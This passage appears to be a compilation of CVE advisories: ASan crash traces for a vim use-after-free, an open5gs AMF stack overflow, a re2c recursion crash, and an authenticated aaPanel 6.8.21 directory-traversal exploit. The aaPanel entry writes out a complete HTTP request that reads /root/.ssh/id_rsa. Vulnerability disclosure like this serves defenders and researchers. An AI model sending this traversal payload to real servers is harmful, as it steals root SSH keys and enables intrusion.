        #19 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #20 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #21 0xec20dd in main /home/aldo/vimtes/src/main.c:424:12
        #22 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
    
    0x6020000062b0 is located 0 bytes inside of 1-byte region [0x6020000062b0,0x6020000062b1)
    freed by thread T0 here:
        #0 0x499a22 in free (/home/aldo/vimtes/src/vim+0x499a22)
        #1 0x4cb4e8 in vim_free /home/aldo/vimtes/src/alloc.c:623:2
        #2 0x8768ee in ml_flush_line /home/aldo/vimtes/src/memline.c:4064:2
        #3 0x884c9c in ml_get_buf /home/aldo/vimtes/src/memline.c:2651:2
        #4 0x8823b8 in ml_get /home/aldo/vimtes/src/memline.c:2564:12
        #5 0x8b2a93 in dec /home/aldo/vimtes/src/misc2.c:424:6
        #6 0x8b2cd4 in decl /home/aldo/vimtes/src/misc2.c:443:14
        #7 0xc86249 in findsent /home/aldo/vimtes/src/textobject.c:53:7
        #8 0x847de7 in getmark_buf_fnum /home/aldo/vimtes/src/mark.c:354:6
        #9 0x8477a4 in getmark_buf /home/aldo/vimtes/src/mark.c:287:12
        #10 0xaa6d84 in regmatch /home/aldo/vimtes/src/./regexp_bt.c:3364:9
        #11 0xaa58ca in regtry /home/aldo/vimtes/src/./regexp_bt.c:4722:9
        #12 0xaa5231 in bt_regexec_both /home/aldo/vimtes/src/./regexp_bt.c:4955:15
        #13 0xa97dec in bt_regexec_multi /home/aldo/vimtes/src/./regexp_bt.c:5067:12
        #14 0xa312ac in vim_regexec_multi /home/aldo/vimtes/src/regexp.c:2864:14
        #15 0xb01a23 in searchit /home/aldo/vimtes/src/search.c:767:14
        #16 0xb06edc in do_search /home/aldo/vimtes/src/search.c:1565:6
        #17 0x6dd9d4 in get_address /home/aldo/vimtes/src/ex_docmd.c:4351:12
        #18 0x6e06ee in parse_cmd_address /home/aldo/vimtes/src/ex_docmd.c:3265:9
        #19 0x6ce320 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:1938:6
        #20 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #21 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #22 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #23 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #24 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #25 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #26 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #27 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #28 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #29 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
    
    previously allocated by thread T0 here:
        #0 0x499c8d in malloc (/home/aldo/vimtes/src/vim+0x499c8d)
        #1 0x4cb0e0 in lalloc /home/aldo/vimtes/src/alloc.c:248:11
        #2 0x4cb039 in alloc /home/aldo/vimtes/src/alloc.c:151:12
        #3 0xbcc84c in vim_strnsave /home/aldo/vimtes/src/strings.c:44:9
        #4 0x885952 in ml_replace_len /home/aldo/vimtes/src/memline.c:3441:13
        #5 0x885826 in ml_replace /home/aldo/vimtes/src/memline.c:3404:12
        #6 0x6ba35c in ex_substitute /home/aldo/vimtes/src/ex_cmds.c:4665:4
        #7 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #8 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #9 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #10 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #11 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #12 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #13 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #14 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #15 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #16 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #17 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #18 0xec20dd in main /home/aldo/vimtes/src/main.c:424:12
        #19 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/aldo/vimtes/src/mbyte.c:1789:9 in utf_ptr2char
    Shadow bytes around the buggy address:
      0x0c047fff8c00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c20: fa fa 00 00 fa fa 00 00 fa fa 05 fa fa fa 00 fa
      0x0c047fff8c30: fa fa fd fa fa fa 03 fa fa fa fd fa fa fa 03 fa
      0x0c047fff8c40: fa fa fd fa fa fa 03 fa fa fa fd fa fa fa 00 00
    =>0x0c047fff8c50: fa fa 01 fa fa fa[fd]fa fa fa 00 04 fa fa 00 04
      0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==49542==ABORTING
    

**💥 Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

CVE-2022-1154: Use after free in utf_ptr2char in vim

A buffer overflow vulnerability exists in the AMF of open5gs 2.1.4. When the length of MSIN in Supi exceeds 24 characters, it leads to AMF denial of service.

When I use open5gs of version 2.1.4 on Ubuntu 20.04 system, I found a problem:

When the UE is in initially registered period, if the length of MSIN（part of Supi） exceeds the normal length by 24 characters, AMF stack smashing will be caused, resulting in denial of AMF service  
![image](https://user-images.githubusercontent.com/38995928/137753834-7b7bbbff-761b-46df-8e4f-b473c22acc6c.png)

I analyzed the causes of this problem:  
When open5gs handles the initialUEMessage process, the requested space size is fixed（OGS\_MAX\_IMSI\_BCD\_LEN is 15）, and AMF does not verify the length of Supi number,This leads to stack overflow  
![image](https://user-images.githubusercontent.com/38995928/137748362-2e6df7b3-018d-4929-b1a7-b8164ed2f435.png)

CVE-2021-44081: Version2.1.4 :AMF stack smashing  · Issue #1206 · open5gs/open5gs

A stack overflow re2c 2.2 exists due to infinite recursion issues in src/dfa/dead_rules.cc.

Operating System Version：ubuntu 20.04

re2c version：2.2

error function：re2c::backprop

\==9992==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdf3f83ff8 (pc 0x00000066f8e0 bp 0x000000135534 sp 0x7ffdf3f84000 T0)  
#0 0x66f8e0 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long) re2c/src/dfa/dead\_rules.cc:149:9  
#1 0x66f8e4 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long) re2c/src/dfa/dead\_rules.cc:149:9  
#2 0x66f8e4 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long) re2c/src/dfa/dead\_rules.cc:149:9  
#3 0x66f8e4 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long) re2c/src/dfa/dead\_rules.cc:149:9  
Omit.....  
#245 0x66f8e4 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long)re2c/src/dfa/dead\_rules.cc:149:9  
#246 0x66f8e4 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long)re2c/src/dfa/dead\_rules.cc:149:9  
#247 0x66f8e4 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long) re2c/src/dfa/dead\_rules.cc:149:9  
#248 0x66f8e4 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long)re2c/src/dfa/dead\_rules.cc:149:9  
AddressSanitizer: stack-overflow re2c/src/dfa/dead\_rules.cc:149:9 in re2c::backprop(re2c::rdfa\_t const&, bool\*, unsigned long, unsigned long)

Test example link：

https://drive.google.com/file/d/1bLXgifNQhcTQI6937lJhapAa3hgwEugT/view?usp=sharing

Run the following command to repeat the error：

$ ./re2c example

CVE-2022-23901: Stack overflow due to recursion in src/dfa/dead_rules.cc · Issue #394 · skvadrik/re2c

aaPanel v6.8.21 was discovered to be vulnerable to directory traversal. This vulnerability allows attackers to obtain the root user private SSH key(id_rsa).

    # Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
    # Date: 22.02.2022
    # Exploit Author: Fikrat Ghuliev (Ghuliev)
    # Vendor Homepage: https://www.aapanel.com/
    # Software Link: https://www.aapanel.com
    # Version: 6.8.21
    # Tested on: Ubuntu
    
    Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)
    
    #Go to App Store
    
    #Click to "install" in any free plugin.
    
    #Change installation script to ../../../root/.ssh/id_rsa
    
    POST /ajax?action=get_lines HTTP/1.1
    Host: IP:7800
    Content-Length: 41
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
    Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://IP:7800
    Referer: http://IP:7800/soft
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
    request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
    serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
    page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
    distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
    load_type=null; load_search=undefined; force=0; rank=list;
    Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
    path_dir_change=/www/wwwroot/
    Connection: close
    
    num=10&filename=../../../root/.ssh/id_rsa

Tag

#ubuntu